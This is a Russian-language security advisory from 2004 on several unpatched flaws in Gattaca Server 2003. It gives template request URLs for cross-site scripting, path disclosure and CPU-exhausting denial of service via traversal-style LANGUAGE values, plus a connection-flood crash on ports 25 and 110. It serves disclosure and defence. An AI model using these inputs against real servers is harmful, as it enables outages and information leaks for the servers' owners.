Несколько уязвимостей в Gattaca Server 2003
| Дата публикации: | 18.07.2004 |
| Всего просмотров: | 922 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Отказ в обслуживании Раскрытие системных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Gattaca Server 2003 1.x |
| Уязвимые версии: Gattaca Server 2003 (1.1.10.0)
Описание: Несколько уязвимостей обнаружено в Gattaca Server 2003. Удаленный пользователь может аварийно завершить работу сервера. Удаленный пользователь может определить инсталляционный путь и Web root каталог. Удаленный пользователь может выполнить XSS нападение. 1. XSS: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[cod e]//[code] http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en2. Раскрытие пути: http://[host]/%00 http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[what ever]3. DoS (100% CPU): http://[host]/index.tmpl?HELPID=1000&TEMPLA TE=skins//water&LANGUAGE=/ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANG UAGE=. http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\ http://[host]/web.tmpl?H ELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en4. Также удаленный пользователь может открыть около 600 подключений к целевому серверу на 25 и 110 TCP порту, чтобы аварийно завершить работу сервера. URL производителя: http://www.gattaca-server.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Security Advisory |